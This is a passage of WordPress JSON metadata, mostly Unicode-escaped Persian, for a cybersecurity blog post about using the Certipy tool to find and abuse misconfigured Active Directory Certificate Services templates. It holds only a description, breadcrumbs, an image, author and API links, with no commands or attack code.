\u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.","breadcrumb":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#breadcrumb"},"inLanguage":"fa-IR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/"]}]},{"@type":"ImageObject","inLanguage":"fa-IR","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage","url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","contentUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","width":1024,"height":682,"caption":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy"},{"@type":"BreadcrumbList","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u062e\u0627\u0646\u0647","item":"https:\/\/liangroup.net\/blog\/"},{"@type":"ListItem","position":2,"name":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy"}]},{"@type":"WebSite","@id":"https:\/\/liangroup.net\/blog\/#website","url":"https:\/\/liangroup.net\/blog\/","name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/liangroup.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fa-IR"},{"@type":"Person","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a","name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","sameAs":["https:\/\/liangroup.net"],"url":"https:\/\/liangroup.net\/blog\/author\/s-teymouri\/"}]}},"_links":{"self":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19879","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/comments?post=19879"}],"version-history":[{"count":0,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19879\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media\/19915"}],"wp:attachment":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media?parent=19879"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/categories?post=19879"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/tags?post=19879"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}